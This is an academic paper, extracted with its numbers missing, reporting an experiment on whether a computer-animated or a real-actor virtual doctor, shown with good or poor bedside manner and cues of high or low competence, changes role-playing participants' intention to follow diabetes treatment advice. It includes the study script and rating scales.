graduate students, age or older, from a midwestern us public university system. participation was voluntary, and testing was conducted at a time and location chosen by the participant. the study was approved by the indiana university office of research administration (january , , ohrp category , study no. ). informed consent was obtained from all participants. documentation of informed consent was waived under cfr . (c) or cfr . (c)( ). explanation of aspects of the experiment that could have affected its outcome was delayed until after participation under cfr . (d). the research was performed in accordance with all relevant federal, state, and university standards, policies, and regulations on human subjects research. research design the experiment had a � � between-groups posttest-only design (independent variables). each participant was randomly assigned to one of eight treatment groups, representing either a low or high level of warmth, competence, and realism. procedure after providing demographic information and reading introductory text, each participant assumed the role of a patient in a virtual consultation (appendix a: script). the consultation began with the patient’s blood sugar testing higher than normal. dr. richards appeared in a video wearing a white shirt, tie, and lab coat with a stethoscope draped over his shoulders. he was standing and holding a clipboard with the patient’s test results. the consultation proceeded through seven hypothetical doctor–patient exchanges and a final reply from the doctor. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in each doctor–patient exchange, the participant replied to the doctor by choosing one of four text-based responses. to maintain experimental control, the doctor’s statements were phrased to follow logically from any of the preceding responses. after the consultation, the participant completed a questionnaire for the posttest indices (dependent variables). independent variables the independent variables were character, outcome, and realism. each variable had a high and a low level. these constituted the eight treatment conditions. character dr. richards’s character was reflected in his bedside manner, which was either good or poor. character was represented by approximately % of the doctor’s dialogue. the good-manner treatments included expressions of caring, encouragement, praise, and confidence in the patient and treatment, offers of availability and support, and recommendations of external resources. the poor-manner treatments included complaining about others, using disparaging and offensive language, showing a lack of availability, demeaning and discouraging the patient, cracking a joke at the patient’s expense, and assuming the patient had petrifying fears and ingrained habits. dr. richards’ remaining dialogue ( of – words) was identical between the good-manner and poor-manner conditions. in this dialogue, dr. richards interpreted the patient’s test results as possibly indicating diabetes and invited the patient for a retest. he also explained type and type diabetes and their symptoms, complications, biological mechanism, and treatments. outcome dr. richards’ outcome is either a fellowship or a malpractice lawsuit. a high- and low-competence subplot was set up immediately before the virtual consultation. first, the participant overheard another patient in the waiting room discussing a malpractice lawsuit, and subsequently the nurse called the patient back and mentioned that the doctor is up for an award. these events were framed more or less favorably in the high or low competence versions, respectively. the subplot culminated at the end of the consultation. in the high-competence condition, nurse larsson announced, “great news, dr. richards! the american college of physicians is honoring you with a fellowship!” in the low-competence condition, nurse larsson announced, “bad news, dr. richards! meredith pratley decided to go ahead with the malpractice lawsuit.” depiction the depiction of the entire virtual consultation was either real or computer animated; however, both versions used the same recording, namely, the voice of the actor playing dr. richards and off-screen actress playing nurse larsson. the high-realism treatment used a recorded video of the actor (fig. ). the low-realism treatment used a video of a computer model developed from high-resolution reference photographs of the same actor. the actor’s clothing, props, and environment were all developed the same way. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the computer models were animated manually using the real video as a reference. the animated dr. richards’ lips were synchronized to the real actor’s speech. the affective lip and eyebrow movements were precisely synchronized to the video by hand but appeared less emphatic. the same computer model had been used in a different scenario and found to be significantly more eerie than the real actor (patel & macdorman, ). dependent variables the semantic differential scales comprising the posttest indices are listed in appendix b. the indices represent unweighted averages of interval measurements from their respective semantic differential scales. the scales were implemented as visual analogue scales (funke & reips, ; reips & funke, ). each scale was represented by an adjective (or phrase) and its antonym on opposite ends of a horizontal bar. the participant had to place a mark on the bar, and depending on where the mark was placed, a decimal value between - . and . was recorded for that scale. likert scales were also implemented as visual analogue scales with strongly disagree and strongly agree on opposite ends of the horizontal bar. index and scale order were randomized. warmth and competence dr. richards’ warmth and competence were measured using three source credibility indices (mccroskey & teven, ): goodwill, trustworthiness, and competence. goodwill and trustworthiness formed a single warmth index. human realism and eeriness dr. richards’ human realism and eeriness were measured using three source appearance indices: realism, humanness, and eeriness (ho & macdorman, ). realism and humanness formed a single human realism index. adherence intention intention to adhere to dr. richards’ treatment advice was measured using an index designed specifically for this virtual consultation. enjoyment narrative appreciation of the consultation was measured using an enjoyment index. to design the enjoyment index, the program evaluation index (perry et al., ) was converted from intensity scales to semantic differential scales by adding antonyms. results participants overall, participants randomly assigned to eight groups, with – in each group, completed the experiment ( % female, n = ). as a manipulation check, a subset of participants, with – in each group, completed additional items measuring source credibility and appearance ( . % female, n = ). recruitment period and baseline the experiment was conducted from january to march , . most participants grew up in the us ( %, n = ). they ranged in age from to (mdn = , iqr = ( , )). dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data analysis preliminaries test statistics were two tailed and interpreted at a . significance level. partial eta squared (gp ) was interpreted with small = . , medium = . , and large = . thresholds (cohen, ) and cronbach’s a with acceptable = . , good = . , and excellent = . thresholds. factor analysis used oblimin rotation and parallel analysis for the number of factors. all betas (β) were standardized. correlations and path analysis of the structural models were performed in lavaan . , and other analyses in jamovi . . index reliability goodwill and trustworthiness scales loaded on the same factor and together comprised warmth. realism and humanness scales loaded on the same factor and together comprised human realism. three scales not contributing to reliability were removed, specifically, without definite lifespan—mortal was removed from human realism, uninspiring—spine-tingling was removed from eeriness, and item was removed from adherence intention (appendix b). the revised human realism, eeriness, and adherence intention indices were used in the analyses. all indices showed internal reliability (table ). manipulation checks as described below, the manipulation checks found that warmth, competence, and human realism varied as expected; however, character also increased competence and decreased eeriness. depiction had a nonsignificant effect on eeriness, thus indicating that the eeriness manipulation check was unsuccessful. using pillai’s trace, a three-way manova found a significant effect of character, v = . , f( , ) = . , p < . , and depiction, v = . , f( , ) = . , p < . , on the manipulation check variables. separate univariate anovas were conducted to test the main and interaction effects of character, outcome, and depiction on warmth, competence, human realism, and eeriness (table ). character had a significant main effect on warmth, competence, and eeriness with large effect sizes. post hoc tests (tukey’s hsd) showed that the good-manner doctor was rated significantly higher than the poor-manner doctor on warmth and competence and significantly lower on eeriness. character � outcome interaction effect on competence was significant with a small effect size, ss = . , f = . , p = . , h p = . . table psychometric properties of the dependent variables. dv items n m sd α skew warmth - . . . . competence . . . – . human realism - . . . . eeriness - . . . . adherence intention . . . – . enjoyment - . . . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ outcome had a significant effect on competence with a small effect size. the high-competence doctor (awarded fellowship) was rated significantly higher than the low-competence doctor (malpractice lawsuit) on competence. depiction had a significant effect on human realism with a medium effect size but a nonsignificant effect on eeriness. the high-realism doctor was rated higher than the low-realism on human realism. regression analysis multiple linear regression was performed to predict adherence intention from warmth, competence, human realism, eeriness, and enjoyment. although the first model was significant, f( , ) = . , p < . , r = . , adj. r = . , enjoyment was nonsignificant, t = . , p = . , β = . , and it was removed from the second model. furthermore, the second model was significant, f( , ) = . , p < . , r = . , adj. r = . , but human realism was nonsignificant, t = - . , p = . , β = - . , and it was removed from the third model, which had the best fit, f( , ) = . , p < . , r = . , adj. r = . (table ). warmth and competence predicted adherence intention with medium-to-large effect sizes while eeriness inversely predicted adherence intention with a small effect size. hypotheses testing using pillai’s trace, a three-way manova found a significant effect of character, v = . , f( , ) = . , p < . , depiction, v = . , f( , ) = . , p < . , and outcome, v = . , f( , ) = . , p = . on dependent variables. separate univariate anovas were conducted to test the main and interaction effects of character, outcome, and depiction on adherence intention and enjoyment. all main effects were significant (table ). no significant interaction effects were found. table anovas of character, outcome, and depiction on warmth, competence, human realism, and eeriness. iv dv ss f p ηp mdiff se df t ptukey character warmth . . < . . . . . < . competence . . < . . . . . < . human realism . . . eeriness . . < . . – . . – . < . outcome warmth . . . competence . . . . . . . . human realism . . . eeriness . . . depiction warmth . . . competence . . . human realism . . < . . – . . – . < . eeriness . . . note: n = . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ h predicted that the high-warmth source will be more persuasive than the low-warmth source. the main effect of character on adherence intention was significant and large. in the narrative, intention to adhere to the treatment advice of the doctor with good bedside manner was greater than intention to adhere to the treatment advice of the doctor with poor bedside manner (fig. ). thus, h was supported. h predicted that the high-competence source will be more persuasive than the low-competence source. the main effect of outcome on adherence intention was significant but small. intention to adhere to the treatment advice of the doctor awarded the fellowship was greater than intention to adhere to the treatment advice of the doctor sued for malpractice. thus, h was supported. table regression model coefficients for adherence intention. predictor b se β t p intercept . . . < . warmth . . . . < . competence . . . . < . eeriness - . . - . – . . note: n = . table anovas of character, outcome, and depiction on adherence intention and enjoyment. iv dv ss f p ηp mdiff se df t ptukey character adherence intention . . < . . . . . < . enjoyment . . < . . . . . < . outcome adherence intention . . . . . . . . enjoyment . . . . . . . . depiction adherence intention . . . . . . . . enjoyment . . < . . . . . < . note: n = . depiction ( % ci) computer animated real – . . . . good manner character a d h er en ce in te n ti o n poor manner good manner character en jo ym en t poor manner – . – . – . – . a b figure means and % confidence intervals of adherence intention and enjoyment plotted by character and depiction. adherence intention (a) and consultation enjoyment (b) were sig- nificantly greater for the doctor with good bedside manner than the doctor with poor bedside manner. full-size doi: . /peerj-cs. /fig- dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ h predicted that the high-realism source will be more persuasive than the low- realism source. it should be noted that the realism manipulation check was successful, but the eeriness manipulation check was not. the main effect of depiction on adherence intention was significant but small. intention to adhere to the advice of the computer- animated doctor was greater than intention to adhere to the advice of the doctor portrayed by a real human actor. thus, h was not supported. h predicted that the consultation will be more enjoyable with the high-warmth source than the low-warmth source. the main effect of character on enjoyment was significant but small. the consultation with the doctor with good bedside manner was more enjoyable. thus, h was supported. h predicted that consultation will be more enjoyable with the high-competence source than the low-competence source. the main effect of outcome on enjoyment was significant but small. the consultation was more enjoyable with the doctor awarded the fellowship. thus, h was supported. h predicted that realism will influence enjoyment of the virtual consultation. the main effect of depiction on enjoyment was significant but small. the consultation with the computer-animated doctor was more enjoyable. thus, h was supported. secondary analysis depiction (high realism) was predicted to reduce eeriness; however, the results revealed that depiction actually reduced enjoyment and that character (good manner) reduced eeriness. surprisingly, depiction and eeriness were uncorrelated (table ). to explain this, we proposed that enjoyment of the consultation with the computer- animated dr. richards interfered with the measurement of eeriness. however, this interference appeared to be indirect because, although enjoyment and eeriness were significantly correlated, only human realism and warmth were significant predictors of eeriness in a regression model. similarly, only eeriness and enjoyment were significant predictors of warmth; only warmth, human realism, and depiction were significant predictors of enjoyment; and only enjoyment, eeriness, and depiction were significant predictors of human realism. each of these four regression models can be represented by a causal directed graph with an arrow from each predictor variable to the outcome variable. each of these four graphs could contribute variables and edges to a table correlations for analysis of path models of warmth. variables warmth eeriness enjoyment human realism depiction warmth — eeriness - . *** — enjoyment . *** - . ** — human realism . *** - . *** . *** — depiction - . * . - . ** . *** — notes: n = . * p < . . ** p < . . *** p < . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ larger directed graph. thus, the variables and edges of these graphs identified the potential set of path models we sought to analyze by structural equation modeling. a direct effect, represented by an arrow, is a hypothesized relation between two variables. the strength of this relation is a free parameter, which is estimated during model identification. the absence of an arrow between two variables is a fixed parameter (fixed to ). a nonsignificant p-value of a free parameter indicates poor local fit. an upper bound on the number of free parameters was set at by applying the n:q rule, which recommends a minimum : ratio of sample size to free parameters (jackson, ). by the parsimony principle, we specified the simplest model with the highest priority effect first and then proceeded to specify more complex models as necessary by adding direct effects (kline, ). the simplest model, model , had a direct effect from the independent variable depiction to eeriness. this model was rejected because the local fit was nonsignificant (β = . , p = . ). in model , depiction had a direct effect on human realism, and human realism had a direct effect on eeriness. model is shown in fig. . the green arrow indicates a depiction . enjoyment– . human realism . . . warmth . . eeriness – . . – . . model depiction . enjoyment– . human realism . . . warmth . eeriness – . . – . . model model depiction . enjoyment– . human realism . . . . eeriness – . . model depiction . human realism . . eeriness – . . figure path models of the indirect effect of enjoyment of computer animation on eeriness. in the path models, the green arrow indicates a positive direct effect, the red arrow indicates a negative direct effect, and the standardized estimate (β) indicates the strength of the effect. the independent variable depiction, indicating computer animated or real, is the exogenous variable. in model , , and , enjoyment mitigated eeriness by increasing human realism. all models had good local fit, but only model and had good global fit (table ). model is the final model. full-size doi: . /peerj-cs. /fig- dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ positive direct effect, the red arrow indicates a negative direct effect, and the width of each arrow indicates the magnitude of the direct effect. the strength of the direct effects is indicated by the standardized estimate (β) next to the green arrow and the red arrow. all estimates were significant (ps � . ), and all of the following criteria for acceptable global fit were met: p > . (cannot reject the exact fit hypothesis), rmsea � . (a cutoff for marginal fit; maccallum, browne & sugawara, ), rmsea êl = (confidence interval includes zero), and the combination rule (cfi � . and srmr � . ; hu & bentler, ). however, model excludes the theoretically important variable enjoyment. table lists the global fit statistics for this and subsequent path models. for model , all estimates were significant (ps � . ), and all global fit criteria were met. however, model excludes the theoretically important variable warmth. model added a direct effect from eeriness to warmth (β = - . , p < . ). although estimates were significant (ps � . ), none of the global fit criteria were met. thus, model was rejected. model added a direct effect from enjoyment to warmth (β = . , p < . ). all estimates were significant (ps � . ), and all global fit criteria were met. thus, model was accepted. it is our final model. as a best practice, it is recommended to compare the final model with theoretically plausible alternative models (kline, ). model was compared with two alternative models by switching the direction of the direct effect between eeriness and warmth (model a) and between both eeriness and warmth and enjoyment and human realism (model b). although all estimates were significant (ps � . ) for these models, model v and rmsea global fit criteria were unmet. thus, these alternative models were rejected. data availability all datasets and r scripts for the analyses are available as supplemental material. discussion each year, nonadherence costs the us healthcare system more than $ billion and results in , deaths (balkrishnan, ; benjamin, ). the global human and financial costs are far greater (cutler et al., ). real clinicians are a limited resource table global fit statistics for path models of eeriness ( , ) and of eeriness and warmth ( , , a, b). model model x q rmsea cfi srmr xm dfm p :̂ % ci . . . [ . , . ] . . . . . [ . , . ] . . . . . [ . , . ] . . . . . [ . , . ] . . a . . . [ . , . ] . . b . . . [ . , . ] . . note: q, number of free parameters; ci, confidence interval. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (chang et al., ; pickersgill, ; sklar, ) as many countries are facing a shortage of physicians, nurses, and other healthcare professionals (bodenheimer, chen & bennett, ; bodenheimer & smith, ; colwill, cultice & kruse, ; potempa, redman & landstrom, ). these shortages reduce opportunities for the clinical supervision of patients, allowing their nonadherence to increase negative health outcomes. developing virtual consultations to promote adherence could improve patient health while reducing healthcare costs and usage (roebuck et al., ). virtual consultations that use real-time computer animation have many advantages over films and other more traditional interventions. animated virtual consultations can be revised quickly for immediate distribution on the internet (e.g., using software for real-time animation or video capture in a game engine). without hiring actors, virtual clinicians can be adapted to different conditions and treatments, internationalized and localized to different languages and cultures, and tailored to the patient’s demographic group (desmet et al., ). the controllability of virtual humans and reproducibility of their behavior make virtual consultations an effective platform for experiments investigating clinical interactions. because virtual humans can assume the patient’s role, they can also be used to teach and assess clinical and communication skills (cook & triola, ; parsons et al., ; persky, ; persky & eccleston, ). thus, using computer-animated healthcare providers in clinical settings offers a promising, cost-effective approach to increase patients’ health literacy and adherence to treatment advice (bickmore, pfeifer & jack, ; bickmore et al., b). as predicted, good bedside manner and a subplot highlighting the doctor’s competence increased intention to adhere to treatment advice among role-playing participants in a hypothetical virtual consultation. surprisingly, adherence intention was lower for the doctor portrayed by a real human actor than by his digital double. thus, the uncanny valley phenomenon posed no threat to the effectiveness of the intervention. on the contrary, the computer-animated doctor increased adherence intention and consultation enjoyment significantly more than the real human. contrary to our previous study, the same digital double used in patel & macdorman ( ) was no more eerie than the same human actor, although eeriness predicted lower warmth. we believe that enjoyment of the animation caused the doctor to be perceived as warmer and more human, which mitigated the negative effects of eeriness associated with the uncanny valley. this explanation is compatible with a path model derived from the data. notably, poor bedside manner increased eeriness. limitations and future work the results identified two potential threats to internal validity owing to the methodology. first, the measurement of eeriness was affected by character traits, such as warmth and competence. for example, the doctor with poor bedside manner was rated significantly eerier than the doctor with good bedside manner. the eeriness index was designed to measure eeriness caused by the uncanny valley, which is typically exhibited by inconsistencies in human realism, and not by a cold personality (ho & macdorman, ). the same computer-animated model that was rated eerier than its human counterpart dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in patel & macdorman ( ) was not significantly different in the present study. this may indicate how cues about character traits can dilute an index intended to measure eeriness (zibrek, kokkinara & mcdonnell, ). to control for the compounding effects of the doctor’s bedside manner and outcome on eeriness, the experiment could administer eeriness scales in a pretest: participants would rate the doctor portrayed by either a real human actor or his digital double in a neutral setting— without any cues on warmth, coldness, competence, or incompetence, and before the narrative is introduced. a second threat to internal validity concerns difficulty in separating computer animation’s positive contribution to adherence intention and consultation enjoyment from the uncanny valley’s possible negative contribution. this can be achieved by employing two versions of the computer-animated doctor, one with greater inconsistency in human realism than the other. thus, a follow-up experiment could control for the compounding effects of computer animation on enjoyment by independently varying aspect aspects of animation found to modulate eeriness. a threat to external validity is the use of role-playing participants instead of participants who fit the scenario, namely, patients in the initial stage of being diagnosed with type diabetes. a number of studies suggest our results may generalize to actual patients. baylor et al. have found animated pedagogical agents to be effective in increasing motivation and learning (baylor, , ; baylor & kim, ; baylor & ryu, ; kim, baylor & shen, ; plant et al., ). reviews of the literature have found interactive media with immersive narratives to be effective in promoting behavior change and in improving health outcomes (baranowski et al., ; desmet et al., ; lu et al., ; read & shortell, ; thompson, ). interpreting the results of the present study in light of these findings, we believe a computer-animated doctor could be effective in clinical settings. therefore, to confirm effectiveness, a follow-up experiment should be conducted with clinical patients. however, substantial changes to the script would be required to ensure patients assigned to the low warmth and low competence conditions were not harmed relative to current best practices. in addition, certain dramatic elements of the script would need to be revised to render it medically accurate and ethical to employ in a clinical setting. conclusions the uncanny valley is the experience of perceiving simulated humans as eerie (mangan, ). mori ( ), who proposed the theory in , attributed the phenomenon to some features of the simulation appearing more human than others. several empirical studies support his claim (chattopadhyay & macdorman, ; macdorman et al., ; macdorman & chattopadhyay, ; mitchell et al., ; seyama & nagayama, ). this study examined the uncanny valley in a hypothetical virtual consultation, casting in the role of doctor either a real human actor or his digital double. with the exception of patel & macdorman ( ), previous experiments on how human realism affects persuasion have not considered the uncanny valley. further, they dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have lacked the experimental control of using a digital double to simulate the appearance and behavior of a real human. no previous study has addressed these issues with respect to a patient’s intention to adhere to treatment advice. the findings show the effectiveness of a digital double relative to a real human in promoting adherence intention with role-playing participants. in addition, they show increased enjoyment of the consultation with the computer-animated doctor, which could indicate future acceptance of the technology. cues of the doctor’s warmth and competence remained effective despite the use of realistic computer animation. thus, insofar as the uncanny valley may have come into play, it did not impede the effectiveness of the computer-animated virtual consultation. patient nonadherence to treatment poses a major threat to public health (iuga & mcguire, ; vermeire et al., ). our findings suggest that an animated virtual consultation could be more effective and enjoyable than a consultation filmed with a real human actor. further testing is needed in clinical settings. the effectiveness of the animated virtual consultation with role-playing participants should encourage the development and clinical testing of this technology, which has advantages over creating content with human actors, such as ease of scenario revision, internationalization, localization, personalization, and web distribution (bickmore, pfeifer & jack, ; bickmore, pfeifer & paasche-orlow, ; bickmore et al., a; desmet et al., ). appendix a: script [text introducing the narrative]. outcome treatment both conditions: one afternoon, you visit dr. richards, a primary care physician, for a routine physical examination. as instructed by the nurse, jane larsson, you ate nothing on the morning of your appointment. low competence: in the waiting room, two women are seated together, and you hear one of them say, “meredith, you deserve compensation. you have a strong case.” high competence: in the waiting room, you overhear a patient, meredith pratley, tell her husband, “the lawyer says, if we sue the doctor, we both could make a ton of money.” both conditions: after the examination, you learn from dr. richards that your blood sugar tested higher than normal. you undergo some further blood work and return to the waiting room. after a while, nurse larson calls you back into the doctor’s office. low competence: walking to the office, the nurse whispers, “dr. richards is up for an award. i’m sure it will go to his head!” high competence: walking to the office, the nurse gushes, “dr. richards is up for an award. today we find out the result!” you are greeted by dr. richards. [depiction treatment: the virtual consultation begins with either computer animation or a recorded video]. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ character treatment dr. richards, poor manner: [rolling eyes peevishly and shaking head]. how’d you like our noisy waiting room? it sounds like the ghetto clinic where dr. mehta volunteers. and they’re all here for me. i inherited this disaster when she took maternity leave so : : : dr. richards, both conditions: i’m sorry you were kept waiting. from your latest blood work, your fasting blood sugar level is , which is higher than we’d like to see. if it tests above again, we’ll have to consider the possibility that you have diabetes. dr. richards, good manner: but don’t be too concerned. it’s not clear you have it, and even if you do, it’s very common, and we know how to treat it. [participant selects a response]. a) what is the chance i have diabetes? b) when will you know for sure whether i have diabetes? c) will you retest my blood glucose level today? d) do my other lab results also indicate diabetes? character treatment dr. richards, good manner: again, i wouldn’t be too concerned because although : : : dr. richards, both conditions: your hemoglobin a c and triglycerides are elevated. these might be signs of diabetes or a prediabetic condition. to be sure, we’ll need to retest you. come back at least hours after taking a meal without processed sugar. i want you to get the results fast, so i’ll fit you in tomorrow : : : dr. richards, poor manner: if somebody cancels. right now, i have to reserve my one open slot for a true emergency. [participant selects a response]. a) what should i know about diabetes? b) what type of diabetes do i have? c) is it more likely i have type or type diabetes? d) what is the difference between type and type diabetes? character treatment dr. richards, poor manner: you should know [chuckling] it doesn’t really matter what type of diabetes you have because : : : dr. richards, both conditions: diabetes, both type and , involves your blood sugar being high enough to put your health at risk. this is due to a lack of insulin. in type your body doesn’t make any insulin, because the cells that make it in the pancreas have been killed by the immune system. in type your body makes some insulin, but it’s either not enough or not used well. for both types, the most common symptoms are excessive thirst and frequent urination. if it turned out you had diabetes, it’s probably type , because of the late onset. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dr. richards, good manner: i certainly hope you have neither type, but type is less severe and easier for us to treat. [participant selects a response]. a) i don’t feel thirsty that often. b) i don’t urinate very frequently. c) do you have to feel thirsty and urinate frequently to have diabetes? d) i only have one of those symptoms. character treatment dr. richards, poor manner: [incredulous]. if you’re like most patients, you don’t know how to assess your own symptoms and : : : dr. richards, both conditions: it’s possible to show no symptoms. a third of those with diabetes don’t even know they have it. but it’s important to get treated to keep the symptoms from developing and to prevent complications. dr. richards, good manner: i’m glad to say there are many treatments today that didn’t exist years ago. our understanding of the condition is constantly improving. [participant selects a response]. a) what complications are caused by diabetes? b) what can i do to prevent complications related to diabetes? c) how does the disease progress? d) do the complications of type diabetes differ from type ? character treatment dr. richards, poor manner: [checks time on watch and scoffs] look : : : dr. richards, both conditions: the same complications are associated with both types: heart disease; kidney disease; blindness; a shortened lifespan. however, their risk can be greatly reduced with the right treatment. dr. richards, good manner: so, don’t worry. if you have any health issues, we’ll do [emphatically] everything we can to help you. [participant selects a response]. a) how does diabetes cause blindness? b) why would high blood sugar shorten my life? c) how is a lack of insulin related to heart disease? d) how can diabetes lead to kidney disease? character treatment dr. richards, good manner: that condition might happen, far in the future, to someone who isn’t doing enough to control the disease. [upbeat tone]. but you’re asking great questions. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dr. richards, both conditions: [rising tone]. how does diabetes cause that? all your organ systems have one thing in common: they rely on proteins to function. if your body doesn’t make enough insulin, sugar binds to those proteins and keep them from working. this is why some people need to inject themselves with insulin. dr. richards, poor manner: have you ever made crème brûlée? take some custard—your proteins—sprinkle on sugar and caramelize it with body heat. [chuckling] you’re making crème brûlée out of your body. [participant selects a response]. a) earlier you mentioned treatment options. b) could you tell me more about what i can do to improve my prospects? c) will i have to inject myself with insulin? d) i don’t feel comfortable using needles. character treatment dr. richards, poor manner: [nodding teasingly]. i bet you’re terrified of needles, but in the early stages of diabetes : : : dr. richards, both conditions: injections aren’t always necessary. sometimes pills are enough. getting plenty of exercise and eating a sensible diet are also key in stopping the disease from getting worse. we can discuss lifestyle changes at your next appointment : : : dr. richards, poor manner: [impatiently] : : : because i’ve got a waiting room full of people. you see, the trouble is your diet and exercise habits are so ingrained they’re almost impossible for you to change. so you might as well go straight to the pills or needles. [participant selects a response]. a) what’s wrong with my current diet? b) what kind of diet and exercise program do you recommend? c) i feel i am already exercising enough. d) is there a type of exercise that is best for people with diabetes? character treatment dr. richards, poor manner: let’s stop here. the first time you hear [pause] diabetes, you freeze. that’s all you hear. you’re thinking, “i’m going to lose a foot! i’ll go blind!” so there’s really no point in talking about your case now. take this brochure. read it before your next appointment, and you’ll be able to ask better-informed questions. dr. richards, good manner: it’s important to quantify and monitor improvements in diet and exercise, because people tend to underestimate their food intake and overestimate their exercise time. working with a nutritionist and personal trainer can help with this. you might also consider joining a patient support group. my patients have told me they have learned more in a couple of weeks at a patient support group than in six months of coming to this office, because these groups are run by people who really know what it’s like dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to have the disease. feel free to contact me if you have any questions or concerns. i look forward to seeing you tomorrow. [subplot ending]. outcome treatment low competence: nurse larsson: “bad news, dr. richards! meredith pratley decided to go ahead with the malpractice lawsuit.” dr. richards: “it’s unfortunate she feels that way.” high competence: nurse larsson: “great news, dr. richards! the american college of physicians is honoring you with a fellowship.” dr. richards: “that is great news!” [virtual consultation ends]. appendix b: indices indicate your level of agreement with the following statements about dr. richards. goodwill . insensitive—sensitive . cares about me—doesn’t care about me r . concerned with me—not concerned with me r . not understanding—understanding . has my interests at heart—doesn’t have my interests at heart r . self-centered—not self-centered trustworthiness . honorable—dishonorable r . moral—immoral r . untrustworthy—trustworthy . honest—dishonest r . unethical—ethical . phony—genuine competence . intelligent—unintelligent r . bright—stupid r . inexpert—expert . incompetent—competent dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . informed—uninformed r . untrained—trained realism . computer animated—real . replica—original . digitally copied—authentic humanness . inanimate—living . synthetic—natural . mechanical movement—biological movement . human-made—humanlike . without definite lifespan—mortal eeriness . ordinary—creepy . plain—weird . predictable—eerie . typical—supernatural . bland—uncanny . dull—freaky . boring—shocking . uninspiring—spine-tingling adherence intention indicate your level of agreement in your role as patient during the consultation. strongly disagree—strongly agree . i’d return to dr. richards for diabetes retesting. . if i were diagnosed as prediabetic, i would consult a different doctor instead of dr. richards. r . i’d ignore any treatment advice from dr. richards. r . i’d double my number of meals and cut the quantity in half, if dr. richards said it would prevent complications. . i’d inject myself with insulin minutes before each meal if dr. richards recommended it. . i’d follow dr. richards’ recommendation to exercise at least half an hour each day. . i could not rid my diet of sugar even if dr. richards ordered it. r . i’d make any lifestyle change dr. richards’ suggests to stop the disease from progressing. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ enjoyment . exciting—ordinary . suspenseful—predictable . boring—interesting r . entertaining—dull . amusing—tedious . unimaginative—imaginative r . depressing—cheerful r . enjoyable—unpleasant . fun—tiresome . awkward—adept r . professional—amateurish . humorous—solemn supplementary material: videos the videos may be viewed at doi . /m .figshare. . acknowledgements we would like to express our appreciation to himalaya patel, lino stephen, jennifer k. stewart, and zebulun m. wood for helping to produce the interactive visual narratives: himalaya patel filmed and edited the narratives; himalaya patel and zebulun wood took reference photographs for computer modeling; lino stephen modeled the doctor and his props and office; and jennifer k. stewart voiced the nurse. additional information and declarations funding this research was supported by an iupui signature center grant. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosure the following grant information was disclosed by the authors: an iupui signature center. competing interests the authors declare that they have no competing interests. author contributions � zhengyan dai performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � karl f. macdorman conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the study was approved by the indiana university office of research administration (january , , ohrp category , study no. ). data availability the following information was supplied regarding data availability: the raw data can be found in the supplemental information. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references an lc, demers mr, kirch ma, considine-dunn s, nair v, dasgupta k, narisetty n, resnicow k, ahluwalia j. . a randomized trial of an avatar-hosted multiple behavior change intervention for young adult smokers. journal of the national cancer institute monographs ( ): – doi . /jncimonographs/lgt . anam r, andrade ad, ruiz jg. . promoting lifestyle change through medical avatars. encyclopedia of e-health and telemedicine. : – . hershey: igi global doi . / - - - - .ch . bailenson jn, yee n, merget d, schroeder r. . the effect of behavioral realism and form realism of real-time avatar faces on verbal disclosure, nonverbal disclosure, emotion recognition, and copresence in dyadic interaction. presence: teleoperators and virtual environments ( ): – doi . /pres. . . . balkrishnan r. . the importance of medication adherence in improving chronic-disease related outcomes: what we know and what we need to further know. medical care ( ): – doi . / .mlr. . . f. baranowski t, buday r, thompson di, baranowski j. . playing for real: video games and stories for health-related behavior change. american journal of preventive medicine ( ): – .e doi . /j.amepre. . . . baylor al. . promoting motivation with virtual agents and avatars: role of visual presence and appearance. philosophical transactions of the royal society of london b: biological sciences ( ): – doi . /rstb. . . baylor al. . the design of motivational agents and avatars. educational technology research and development ( ): – doi . /s - - - . baylor al, kim y. . simulating instructional roles through pedagogical agents. international journal 